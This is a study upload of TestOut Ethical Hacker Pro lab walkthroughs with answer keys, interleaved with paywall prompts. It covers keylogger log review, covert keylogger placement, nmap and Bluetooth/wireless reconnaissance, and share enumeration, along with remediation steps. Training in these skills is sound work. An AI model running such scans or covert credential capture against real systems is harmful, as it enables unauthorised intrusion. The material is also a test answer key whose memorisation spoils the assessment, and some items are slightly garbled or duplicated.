TestOut Ethical Hacker Pro Domain Review
pdf
keyboard_arrow_up
School
Sinclair Community College *
*We aren’t endorsed by this school
Course
2650
Subject
Information Systems
Date
Dec 6, 2023
Type
Pages
130
Uploaded by Raedwulf
TestOut Ethical Hacker Pro
Domain Review
A.2.1 Pro Domain 1: Prepare
QUESTION 1:
Recently, the administrative assistant found a foreign device
connected to the ITAdmin computer while updating some of their
hardware. The device was turned over to you, and you have
determined that it is a keylogger. You need to sift through the
information on the keylogger to find which accounts may be
compromised.
In this lab, your task is to determine which corporate accounts have
been compromised as follows:
•
Plug the keylogger into ITAdmin's USB port.
•
Use the keyboard combination of SBK to toggle the USB
keylogger from keylogger mode to USB flash drive mode.
•
Open the LOG.txt file and inspect the contents.
•
Scan the document for corporate passwords or financial
information.
•
Answer the questions.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 6 minutes 18 seconds
Required Score: 100%
Task Summary
Lab Questions
Plug the keylogger into ITAdmin
Q1
Which of the following accounts were breached?
Q2
What credit card number was captured by the keylogger?
Explanation
In this lab, your task is to determine which corporate accounts have been compromised:
•
Plug the keylogger into ITAdmin's USB port.
•
Use the keyboard combination of SBK to toggle the USB keylogger from keylogger mode
to USB flash drive mode.
•
Open the LOG.txt file and inspect the contents.
•
Scan the document for corporate passwords or financial information.
•
Answer the questions.
Complete this lab as follows:
1.
On the Shelf, expand
Storage Devices
.
2.
From the shelf, drag the
USB Keylogger
to a USB port on ITAdmin.
3.
On the monitor, select
Click to view Windows 10
.
4.
Press
S + B + K
to toggle from the keylogger mode to the flash drive mode.
5.
Select
Tap to choose what happens with removable drives
.
6.
Select
Open folder to view files
.
7.
Double-click
LOG.txt
to open the file.
8.
Maximize the window for easier viewing.
9.
In the top right, select
Answer Questions
.
10.
In the file, find which account passwords were captured.
11.
In the file, find any compromised financial information.
12.
Select
Score Lab
.
Lab Questions:
1.
Which of the following accounts were breached?
a.
Amazon.com
b.
Email.com
2.
What credit card number did the keylogger capture?
a.
4556358591800117
QUESTION 2:
The CEO of CorpNet.xyz has hired your firm to obtain some
passwords for their company. A senior IT network administrator, Oliver
Lennon, is suspected of wrongdoing and suspects he is going to be
fired from the company. The problem is that he changed many of the
standard passwords known to only the top executives, and now he is
the only one that knows them. Your company has completed the legal
documents needed to protect you and the company.
With the help of a CorpNet.xyz executive, you were allowed into the IT
Admin's office after hours. You unplugged the keyboard from the back
of the ITAdmin computer and placed a USB keylogger into the USB,
then plugged the USB keyboard into the keylogger. After a week, the
company executive lets you back into the IT Admin's office after hours
again.
In this lab, your task is to use the keylogger to recover the changed
passwords as follows:
•
Move the keyboard USB connector to a different USB port on
ITAdmin.
•
Remove the keylogger from ITAdmin.
•
Move the consultant laptop from the Shelf to the Workspace.
•
Plug the keylogger into the consultant laptop's USB drive.
•
Use the SBK key combination to toggle the USB keylogger from
keylogger mode to USB flash drive mode.
•
Open the LOG.txt file and inspect the contents.
•
Find the olennon account's password.
•
Find the Administrator account's password.
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Pass Status:
Pass
Elapsed Time: 4 minutes 16 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Plug the keyboard into the Administrator's machine
Plug the keylogger into the consultant's laptop
Q1
What is the olennon user's password?
Q2
What is the Administrator password?
Explanation
In this lab, your task is to use the keylogger to recover the changed passwords as follows:
•
Move the keyboard USB connector to a different USB port on ITAdmin.
•
Remove the keylogger from ITAdmin.
•
Move the consultant laptop from the Shelf to the Workspace.
•
Plug the keylogger into the consultant laptop's USB drive.
•
Use the SBK key combination to toggle the USB keylogger from keylogger mode to USB
flash drive mode.
•
Open the LOG.txt file and inspect the contents.
•
Find the olennon account's password.
•
Find the Administrator account's password.
•
Answer the questions.
Complete this lab as follows:
1.
Above the computer, select
Back
to view the back of the computer.
2.
On the back of the computer, drag the
USB Type A connector
for the keyboard to
another USB port on the computer.
3.
On the Shelf, expand
System Cases
.
4.
Drag the
Laptop
to the Workspace.
5.
Above the laptop, select
Back
to view the back of the laptop.
6.
From the computer, drag the
keylogger
to a
USB port
on the laptop.
7.
Above the laptop, select
Front
to view the front of the laptop.
8.
On the laptop, select
Click to view Windows 10
.
9.
Press
S + B + K
to toggle from the keylogger mode to the flash drive mode.
10.
Select
Tap to choose what happens with removable drives
.
11.
Select
Open folder to view files
.
12.
Double-click
LOG.txt
to open the file.
13.
In the top right, select
Answer Questions
.
14.
Answer the questions.
15.
Select
Score Lab
.
Lab Questions:
1.
What was the olennon user’s password?
a.
P@ssw0rd
2.
What is the Administrator password?
a.
4Lm87Qde
QUESTION 3:
You work for a penetration testing consulting company. Your manager
has asked you to begin gathering information about www.corpnet.xyz.
In this lab, your task is to perform reconnaissance on
www.corpnet.xyz and to find potentially vulnerable ports on the
servers in the CorpNet networks as follows:
•
On Consult-Lap, use the Whois.org site to determine the domain
name servers used by www.corpnet.xyz.
•
On Consult-Lap, use
nslookup
hostname nameserver
to
determine the primary web server address.
•
On Consult-Lap2, use Zenmap to perform an nmap search for
open ports for the 198.28.1.0/24 network.
•
Answer the questions.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 9 minutes 40 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Used WhoIs.org to discover name servers
Q1
Which of the following Name Servers are being used by CorpNet.xyz?
Used nslookup to discover www.corpnet.xyz IP address
Q2
What is the IP address for CorpNet.xyz?
Used nmap to discover open ports for ftp and telnet
Q3
Which of the following servers use the potentially vulnerable ftp and telnet ports?
Explanation
In this lab, your task is to perform reconnaissance on www.corpnet.xyz and to find potentially
vulnerable ports on the servers in the CorpNet networks as follows:
•
On Consult-Lap, use the Whois.org site to determine the domain name servers used by
www.corpnet.xyz.
•
On Consult-Lap, use
nslookup
to determine the primary web server address.
•
On Consult-Lap2, use Zenmap to perform an nmap search for open ports for the
198.28.1.0/24 network.
•
Answer the questions.
Complete this lab as follows:
1.
Find the name servers used by www.corpnet.xyz as follows:
a.
From the taskbar, open Chrome.
b.
In the URL field, type
whois.org
and press
Enter
.
c.
In the Search for a domain name filed, enter
www.corpnet.xyz
.
d.
Select
Search
.
e.
In the top right, select
Answer Questions
.
f.
Answer question 1.
2.
Find the IP address used by www.corpnet.xyz as follows:
a.
Right-click
Start
and select
Windows PowerShell (Admin)
.
b.
At the prompt, type
nslookup www.corpnet.xyz ns1.nethost.net
and
press
Enter
.
c.
Answer question 2.
d.
Minimize the question dialog.
3.
Use Zenmap to run an nmap command to scan for open ports as follows:
a.
From the navigation tabs, select
Buildings
.
b.
Under Red Cell, select
Consult-Lap2
.
c.
From the Favorites bar, open Zenmap.
d.
Maximize Zenmap for easier viewing.
e.
In the Command field type
nmap -p- 198.28.1.0/24
.
f.
Select
Scan
to scan for open ports on all servers located on this network.
g.
In the top right, select
Answer Questions
.
h.
Answer question 3.
i.
Select
Score Lab
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Lab Questions:
1.
Which of the following name servers are being used by CorpNet.xyz?
a.
NS1.NETHOST.NET
b.
NS2.NETHOST.NET
2.
What is the IP address for CorpNet.xyz?
a.
198.28.1.1
3.
Which of the following servers use the potentially vulnerable FTP and Telnet ports?
(Select all that apply.)
a.
198.28.1.3
b.
198.28.1.4
QUESTION 4:
You work for a penetration testing consulting company. Your manager
is concerned about the vulnerability of the company's database server
that contains the finance and accounting systems. He wants you to
perform a port scan with nmap to identify all the open ports on the
server (192.168.0.45).
In this lab, your task is to perform a port scan using nmap in Terminal.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 20 seconds
Required Score: 100%
Task Summary
Required Actions
Perform a port scan using nmap
Explanation
In this lab, your task is to perform a port scan using nmap in Terminal.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
nmap -p- 192.168.0.45
.
3.
Press
Enter
.
QUESTION 5:
You are the IT security administrator, and you are learning to use
some ethical hacking tools. Your friend at a partner company asked
you to scan his company's public-facing servers to see if they have
any obvious vulnerabilities. The Partnernet servers are on the
73.44.216.0 network.
In this lab, your task is to:
•
Perform a Zenmap scan using the following information:
o
Network address:
73.44.216.0
o
Subnet mask:
Class C
•
Answer the questions.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 10 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Scan the 73.44.216.0/24 network
Q1
Do your friend's public facing servers have any obvious security vulnerabilities?
Q2
Which service vulnerability should be remediated first?
Explanation
In this lab, your task is to:
•
Perform a Zenmap scan using the following information:
o
Network address:
73.44.216.0
o
Subnet mask:
Class C
•
Answer the questions.
Complete the following:
1.
From the Favorites bar, open Zenmap.
2.
At the prompt, type
nmap 73.44.216.0/24
.
3.
Select
Scan
.
4.
Find the network vulnerabilities in the output.
5.
In the top right, select
Answer Questions
.
6.
Answer the questions.
7.
Select
Score Lab
.
Lab Questions:
1.
Do
your friend’s public
-facing servers have any obvious security vulnerabilities?
a.
Yes
2.
Which service vulnerability should be remediated first?
a.
Telnet
QUESTION 6:
You are the IT security administrator for a small corporate network. To
protect your Bluetooth devices from hackers, you need to discover
which Bluetooth devices are running in your company and gather
information on each.
In this lab, your task is to scan for Bluetooth devices using Terminal as
follows:
•
Use
hciconfig
to discover and enable the onboard Bluetooth
adapter.
•
Use
hcitool
to scan for Bluetooth devices and find the class ID.
•
Use
l2ping
to determine if the Bluetooth device is alive and
within range.
•
Use
sdptool
to query Philip's Dell Laptop to determine the
Bluetooth services available on the device.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Answer the question.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 2 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Run hciconfig to enable the Bluetooth adapter
Run hcitool to scan for the Bluetooth devices
Use l2ping to determine if a Bluetooth device is up
Run sdptool to query Philip's Dell Laptop
Q1
Using the MAC address, what is the class ID number for the Joanna's Braven speaker?
Explanation
In this lab, your task is to scan for Bluetooth devices using Terminal as follows:
•
Use
hciconfig
to discover and enable the onboard Bluetooth adapter.
•
Use
hcitool
to scan for Bluetooth devices and find the class ID.
•
Use
l2ping
to determine if the Bluetooth device is alive and within range.
•
Use
sdptool
to query Philip's Dell Laptop to determine the Bluetooth services available
on the device.
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
hciconfig
and press
Enter
to view the onboard Bluetooth adapter.
3.
Type
hciconfig hci0 up
and press
Enter
to initialize the adapter.
4.
Type
hciconfig
and press
Enter
to verify that the adapter is up and running.
5.
Type
hcitool scan
and press
Enter
to view the detected Bluetooth devices and their
MAC addresses.
6.
Type
l2ping
MAC address
and press
Enter
to determine if the Bluetooth device is in
range.
7.
Press
Ctrl
+
c
to stop the ping process.
8.
Repeat steps 6
–
7 for each device.
9.
Type
sdptool browse B0:52:23:92:EF:CC
and press
Enter
to view the details for Philip's
Dell Laptop.
10.
Type
hcitool
inq
and press
Enter
to determine the clock offset and class for each device.
11.
In the top left, select
Answer Questions
.
12.
Select the correct answer.
13.
Select
Score Lab
.
Lab Questions:
1.
Using the MAC address, what is the class ID number for the joanna’s Braven speaker
?
a.
0x240404
QUESTION 7:
You are the IT security administrator for a small corporate network. To
achieve Payment Card Industry Data Security Standard (PCI DSS)
certification, you are required to scan for rogue access points
quarterly.
In this lab, your task is to scan for rogue wireless access points using
Terminal as follows:
•
Use
airmon-ng
to discover and enable the onboard wireless
adapter.
•
Use
airodump-ng
to scan for wireless access points.
•
Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 6 minutes 20 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Discover and enable the onboard wireless adapter
Scan for wireless access points
Q1
What is most likely the ESSID of the rogue access point?
Q2
What is the signal power of the rogue access point?
Q3
What is the frequency channel used by the rogue access point?
Explanation
In this lab, your task is to scan for rogue wireless access points using Terminal as follows:
•
Use
airmon-ng
to discover and enable the onboard wireless adapter.
•
Use
airodump-ng
to scan for wireless access points.
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
airmon-ng
and press
Enter
to view and find the name of the
wireless adapter.
3.
Type
airmon-ng start wlp1s0
and press
Enter
to put the adapter in monitor mode.
4.
Type
airmon-ng
and press
Enter
to view the new name of the wireless adapter.
5.
Type
airodump-ng
wlp1s0mon
and press
Enter
to scan for wireless access points.
6.
After a few seconds, press
Ctrl
+
c
to stop the scan.
7.
In the top right, select
Answer Questions
.
8.
Answer the questions.
9.
Select
Score Lab
.
Lab Questions:
1.
What is most likely to be the rogue access point ESSID?
a.
CoffeeShop
2.
What is the rogue access point’s signal power?
a.
-90
3.
What frequency channel is the rogue access point using?
a.
11
QUESTION 8:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
You are the IT security administrator for a small corporate network.
You have some security issues on a few Internet of Things (IoT)
devices. You can use the Security Evaluator to find these problems.
In this lab, your task is to:
•
Find a device using the IP address of 192.168.0.54.
•
Find all devices using an IP address in the range of 192.168.0.60
through 192.168.0.69.
•
Answer the questions.
You are the IT security administrator for a small corporate network.
You're scanning your local network to determine potential
vulnerabilities.
In this lab, your task is to complete the following:
•
Use Zenmap to determine the operating system of the hosts on
your network.
•
On ITAdmin, use
net view
to check for shared folders on
CorpFiles12 and CorpFiles16.
•
Map the H: drive to the Confidential folder on CorpFiles16.
•
View the files in the Employee Records folder.
•
Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 44 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Scanned 192.168.0.54
Q1
What is the name of the IoT device with the IP address of 192.168.0.54?
Q2
How many issues exist for the device with the IP address of 192.168.0.54?
Search for issues using IP range
Q3
In the IP address range of 192.168.0.60 through 192.168.0.69, which IP addresses had
issues?
Explanation
In this lab, your task is to:
•
Find a device using the IP address of 192.168.0.54.
•
Find all devices using an IP address in the range of 192.168.0.60 through 192.168.0.69.
•
Answer the questions.
Complete this lab as follows:
1.
Run a Security Evaluator report for 192.168.0.54 as follows:
a.
From the taskbar, open Security Evaluator.
b.
Next to Target, select the
Target
icon to select a new target.
c.
Select
IPv4 Address
.
d.
Enter
192.168.0.54
as the IP address.
e.
Click
OK
.
f.
Next to Status, select the
Run/Rerun Security Evaluation
icon to run a
security evaluation.
g.
In the top right, select
Answer Questions
.
h.
Answer questions 1 and 2.
2.
Run a Security Evaluator report for an IP range of 192.168.0.60 through 192.168.0.69 as
follows:
a.
From the Security Evaluator, select the
Target
icon to select a new target.
b.
Select
IPv4 Range
.
c.
In the left field, type
192.168.0.60
as the beginning IP address.
d.
In the right field, type
192.168.0.69
as the ending IP address.
e.
Click
OK
.
f.
Next to Status, select the
Run/Rerun Security Evaluation
icon to run a
security evaluation.
g.
Answer question 3.
h.
Select
Score Lab
.
Lab Questions:
1.
What is the name of the IOT device with the IP address of 102.168.0.54?
a.
Wireless Thermostat
2.
How many issues exist for the device with the IP address of 192.168.0.54?
a.
3
3.
In the IP address range of 192.168.0.60 through 192.168.0.69, which IP addresses
had issues? (Select all that apply.)
a.
192.168.0.66
QUESTION 9:
You are the IT security administrator for a small corporate network.
You're scanning your local network to determine potential
vulnerabilities.
In this lab, your task is to complete the following:
•
Use Zenmap to determine the operating system of the hosts on
your network.
•
On ITAdmin, use
net view
to check for shared folders on
CorpFiles12 and CorpFiles16.
•
Map the H: drive to the Confidential folder on CorpFiles16.
•
View the files in the Employee Records folder.
•
Answer the questions.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 30 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use nmap -O 192.168.0.0/24 to scan for operating systems on the local network
Q1
Which computers on the network have a Linux operating system?
Use net view to check the shared folders on CorpFiles12
Use net view to check the shared folders on CorpFiles16
Use net use to map a drive to the confidential folder on CorpFiles16
Q2
Which employee records are found on the open share?
Explanation
In this lab, your task is to complete the following:
•
Use Zenmap to determine the operating system of the hosts on your network.
•
On ITAdmin, use
net view
to check for shared folders on CorpFiles12 and CorpFiles16.
•
Map the H: drive to the Confidential folder on CorpFiles16.
•
View the files in the Employee Records folder.
•
Answer the questions.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Complete this lab as follows:
1.
Scan for operating systems on the network as follows:
a.
From the Favorites bar, open Zenmap.
b.
In the Command field, type
nmap -O 192.168.0.0/24
.
c.
Select
Scan
to scan the local subnet.
d.
In the nmap scan, find the identified
operating systems
.
e.
In the top right, select
Answer Questions
.
f.
Answer question 1.
The nmap -O command may have a hard time recognizing the Windows OS,
but can easily detect Linux.
2.
View the shared folders on CorpFiles12 and CorpFiles16 as follows:
a.
From top navigation tabs, select
IT Administration
.
b.
On the ITAdmin monitor, select
Click to view Windows 10
.
c.
Right-click
Start
and select
Windows PowerShell (Admin)
.
d.
At the prompt, type
net view corpfiles12
and press
Enter
.
e.
Type
net view corpfiles16
and press
Enter
.
3.
Map the H: drive to the Confidential folder on CorpFiles16 as follows:
a.
Type
net use h: \\corpfiles16\confidential
and press
Enter
.
b.
Type
h:
and press
Enter
to change to the H: drive.
4.
View the files in the Employee Records folder as follows:
a.
Type
dir
and press
Enter
to view the folders available on the drive.
b.
Type
cd Employee Records
and press
Enter
.
c.
Type
dir
and press
Enter
to view the employee records.
d.
Answer question 2.
e.
Select
Score Lab
.
Lab Questions:
1.
Which computers on the network have a Linux operating system?
a.
192.168.0.45
b.
192.168.0.46
2.
Which employee records are found on the open share? (Choose all that apply.)
a.
Ralph Debourne
b.
Ben Bispo
c.
Beth Bondo
QUESTION 10:
You are a cybersecurity expert performing a penetration test for a
client. Your client is concerned that hackers may be performing port
scanning on the network, hoping to find open ports that could leave
the company vulnerable to attacks.
In this lab, your task is to use nmap to detect open ports as follows:
•
Scan the following network addresses:
o
198.28.1.0/24
o
192.168.0.0/24
•
Find and report any open ports, especially those susceptible to
hacking attacks.
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 7 minutes 3 seconds
Required Score: 100%
Task Summary
Lab Questions
Run a port scan on 198.28.1.0
Run a port scan on 192.168.0.0
Q1
Which networks contain open ports?
Q2
Which of the following servers have vulnerable open ports?
Explanation
In this lab, your task is to use nmap to detect open ports as follows:
•
Scan the following network addresses:
o
198.28.1.0/24
o
192.168.0.0/24
•
Find and report any open ports, especially those susceptible to hacking attacks.
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
nmap -p- 198.28.1.0/24
and press
Enter
to scan for open ports on
all servers located on this network.
3.
Type
nmap -p- 192.168.0.0/24
and press
Enter
to scan for open ports on all the servers
located on this network.
4.
In the top right, select
Answer Questions
.
5.
Answer the questions.
6.
Select
Score Lab
.
Lab Questions:
1.
Which networks contain open ports?
a.
192.168.0.0
2.
Which of the following servers have vulnerable open ports? (Select all that apply.)
a.
192.168.0.8
b.
192.168.0.10
c.
192.168.0.11
d.
192.168.0.14
QUESTION 11:
You work for a penetration testing consulting company. During an
internal penetration test, you find that VNC is being used on the
network, which violates your company's security policies. It was
installed to maintain access by a malicious employee.
In this lab, your task is to complete the following:
•
From the IT-Laptop, use Zenmap to scan all computers on the
network to see if any devices have port 5900 (VNC) open.
•
Answer Question 1.
•
Go to the suspect computer and uninstall VNC.
•
From the suspect computer, run
netstat
to verify the ports for
VNC are closed.
IP Address
Computer
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
192.168.0.30
Exec
192.168.0.31
ITAdmin
192.168.0.32
Gst-Lap
192.168.0.33
Office1
192.168.0.34
Office2
192.168.0.45
Support
192.168.0.46
IT-Laptop
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 48 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use nmap to find any machine running VNC
Q1
Which server has port 5900 open?
Uninstall VNC
Run netstat to verify the ports for VNC are closed
Explanation
In this lab, your task is to complete the following:
•
Use Zenmap to scan for open ports running VNC. Use the table below to help you
identify the computer.
•
Go to the suspect computer and uninstall VNC.
•
From the suspect computer, run
netstat
to verify the ports for VNC are closed.
IP Address
Computer
192.168.0.30
Exec
192.168.0.31
ITAdmin
192.168.0.32
Gst-Lap
192.168.0.33
Office1
192.168.0.34
Office2
192.168.0.45
Support
192.168.0.46
IT-Laptop
Complete this lab as follows:
1.
Find the server that has port 5900 open.
a.
From the Favorites bar, open Zenmap.
b.
In the Command field, use
nmap -p 5900 192.168.0.0/24
.
c.
Select
Scan
.
d.
From the results, find the
computer
with port 5900 open.
e.
From the top right, select
Answer Questions
.
f.
Answer Question 1.
g.
Minimize the Lab Questions window.
2.
Uninstall VNC from the computer that has port 5900 open.
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Find and select the
computer
that has port 5900 open. (Open the Question
window if needed.)
c.
At the prompt, type
netstat
and press
Enter
to confirm the port is open on
the machine.
d.
Type
dnf list vnc
and press
Enter
to find the package name.
e.
Type
dnf erase libvncserver
and press
Enter
.
f.
Press
Y
and press
Enter
to uninstall the package.
g.
Type
netstat
and press
Enter
to confirm the port has been closed on the
machine.
h.
From the top right, select
Answer Questions
.
i.
Select
Score Lab
.
Lab Questions:
1.
Which IP address had port 5900 open?
a.
Support - 192.168.0.45
QUESTION 12:
You are the IT security administrator for a small corporate network.
You are performing vulnerability scans on your network. Use the
Security Evaluator tool to run a vulnerability scan on the CorpDC
domain controller.
In this lab, your task is to:
•
Run a vulnerability scan for the CorpDC domain controller using
the Security Evaluator on the taskbar.
•
Remediate the vulnerabilities in the Default Domain Policy using
Group Policy Management on CorpDC.
•
Re-run a vulnerability scan to make sure all of the issues are
resolved.
Your Performance
Your Score: 7 of 7 (100%)
Pass Status:
Pass
Elapsed Time: 11 minutes 9 seconds
Required Score: 100%
Task Summary
Required Actions
Reset account lockout counter after 60 minutes
Use a minimum password length of 14 characters
Use a minimum password age of 1 day
Enforce password history for 24 passwords
Event log retention set not to overwrite events
Hide Details
Application log
Security log
System log
DCOM Server Process Launcher service disabled
Task Scheduler service disabled
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Explanation
In this lab, your task is to:
•
Run a vulnerability scan for the CorpDC domain controller using the Security Evaluator
on the taskbar.
•
Remediate the vulnerabilities in the Default Domain Policy using Group Policy
Management on CorpDC.
Policy
Setting
Account Lockout: Reset account lockout
counter after
60 Minutes
Password Policy: Minimum password
length
14 Characters
Password Policy: Minimum password age
1 Day
Password Policy: Enforce password
history
24 Passwords
Event Log: Retention method for
application log
Do not overwrite events (clear log
manually)
Event Log: Retention method for security
log
Do not overwrite events (clear log
manually)
Event Log: Retention method for system
log
Do not overwrite events (clear log
manually)
System Services: DCOM Server Process
Launcher
Disabled
System Services: Task Scheduler
Disabled
•
Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1.
Run a Security Evaluator report as follows:
a.
From the taskbar, open Security Evaluator.
b.
Next to Local Machine, select the
Target
icon to select a new target.
c.
Select
Domain Controller
.
d.
From the Domain Controller drop-down list, select
CorpDC
as the target.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
e.
Click
OK
.
f.
Select
Status Run/Rerun Security Evaluation
icon to run the security
evaluation.
g.
Review the results to determine which issues you need to resolve on CorpDC.
2.
From the top navigation tabs, select
Floor 1
.
3.
Under Networking Closet, select
CorpDC
.
4.
Remediate password issues in Account Policies as follows:
a.
From Server Manager, select
Tools
>
Group Policy Management
.
b.
Maximize the window for easier viewing.
c.
Expand
Forest: CorpNet.local
.
d.
Expand
Domains
.
e.
Expand
CorpNet.local
.
f.
Right-click
Default Domain Policy
and select
Edit
.
g.
Maximize the window for easier viewing.
h.
Under Computer Configuration, expand
Policies
.
i.
Expand
Windows Settings
.
j.
Expand
Security Settings
.
k.
Expand
Account Policies
.
l.
Select
Account Lockout Policy
.
m.
In the right pane, right-click the
policy
and select
Properties
.
n.
Select
Define this policy setting
.
o.
Enter
60
minutes and then click
OK
.
p.
In the left pane, select
Password Policy
.
q.
In the right pane, right-click the
policy
and select
Properties
.
r.
Select
Define this policy setting
.
s.
Enter the
password setting
and then click
OK
.
t.
Repeat steps 4q
–
4s for each additional Password policy.
5.
Remediate Event Log issues as follows:
a.
In the left pane, select
Event Log
.
b.
In the right pane, right-click the
policy
and select
Properties
.
c.
Select
Define this policy setting
.
d.
Enter the
password setting
and then select
OK
.
e.
Repeat steps 5b
–
5d for each additional Event Log policy.
6.
Remediate System Services issues as follows:
a.
In the left pane, select
System Services
.
b.
In the right pane, right-click the
policy
and select
Properties
.
c.
Select
Define this policy setting
.
d.
Make sure
Disabled
is selected and then click
OK
.
e.
Repeat steps 6b
–
6d for each additional System Services policy.
7.
Verify that all the issues were resolved using the Security Evaluator feature on the
ITAdmin computer as follows:
a.
From the top navigation tabs, select
Floor 1
.
b.
Select
ITAdmin
.
c.
In Security Evaluator, select
Status Run/Rerun Security Evaluation
icon to
rerun the security evaluation.
d.
If you still see unresolved issues, select
Floor 1
, navigate to
CorpDC
, and
remediate any remaining issues.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 13:
You are the IT security administrator for a small corporate network.
You need to use a vulnerability scanner to check for security issues on
your Linux computers.
In this lab, your task is to:
•
Use the Security Evaluator to check the security:
o
On the Linux computer with the 192.168.0.45 IP
address.
o
On the Linux computers in the IP address range of
192.168.0.60 through 192.168.0.69
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 12 minutes 57 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Run a Security Evaluator report for 192.168.0.45
Q1
For the Linux computer with the 192.168.0.45 address, which security vulnerability passed?
Run a Security Evaluator report for IP address range of 192.168.0.60-192.168.0.69
Q2
Which IP addresses in the 192.168.0.60 through 192.168.0.69 range had issues that need
to be resolved?
Q3
For the Linux computer with the 192.168.0.65 address, what is the name of the
vulnerability that only has a warning?
Explanation
In this lab, your task is to:
•
Use the Security Evaluator to check the security:
o
On the Linux computer with the 192.168.0.45 IP address.
o
On the Linux computers in the IP address range of 192.168.0.60 through
192.168.0.69
•
Answer the questions.
Complete this lab as follows:
1.
Run a Security Evaluator report for 192.168.0.45 as follows:
a.
From the taskbar, open Security Evaluator.
b.
Next to Local Machine, select the
Target
icon to select a new target.
c.
Select
IPv4 Address
.
d.
Enter
192.168.0.45
e.
Click
OK
.
f.
Select
Status Run/Rerun Security Evaluation
icon to run the security
evaluation.
g.
Review the results.
h.
In the top right, select
Answer Questions
.
i.
Answer question 1.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
2.
Run a Security Evaluator report for the IP address range of 192.168.0.60 through
192.168.0.69 as follows:
a.
In Security Evaluator, select the
Target
icon to select a new target.
b.
Select
IPv4 Range
.
c.
In the left field, type:
192.168.0.60
d.
In the right field, type:
192.168.0.69
e.
Click
OK
.
f.
Select
Status Run/Rerun Security Evaluation
icon to run the security
evaluation.
g.
Review the results.
h.
Answer questions 2 and 3.
i.
Select
Score Lab
.
Lab Questions:
1.
For the Linux computer with the 192.168.0.45 address, which security
vulnerability?
a.
Root
–
Password Does Not Expire
2.
Which IP addresses in the 192.168.0.60 through 192.168.0.69 range has issues that
need to be resolved? (Select all that apply.)
a.
192.168.0.65
b.
192.168.0.68
3.
For the Linux computer with the 192.168.0.45 address, what is the name of the
vulnerability that only had a warning?
a.
Backup
–
Password Does Not Expire
QUESTION 14:
You are the IT security administrator for a small corporate network.
You perform regular vulnerability scans on your network. Recently,
you added a new network security appliance (NSA) to the network.
You used the ITAdmin workstation when you configured the NSA.
In this lab, your task is to:
•
Run a vulnerability scan for the network security appliance (NSA)
(198.28.56.18) using Security Evaluator on the taskbar.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Remediate the vulnerabilities found in the vulnerability report on
the NSA.
o
Rename the cisco user account using the following
parameters:
▪
Set a username of
your choice
.
▪
Set a password of
your choice
.
▪
Set the idle timeout to
15 minutes or less
.
▪
Set LAN access only for your user (no WAN
access).
▪
Allow access to your user only from the ITAdmin
workstation (192.168.0.31).
•
Re-run a vulnerability scan to make sure all of the issues are
resolved.
“
Access the NSA management console through Google Chrome
on
http://198.28.56.18
using the username
cisco
and the
password
cisco
.
”
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 10 minutes 43 seconds
Required Score: 100%
Task Summary
Required Actions
Change the default Admin username
Change the default Admin password
Change the idle timeout for the Admin user to 15 minutes or less
Limit administrative access for the Admin user to WAN only
Limit administrative access for the Admin user to only the ITAdmin computer
Explanation
In this lab, your task is to:
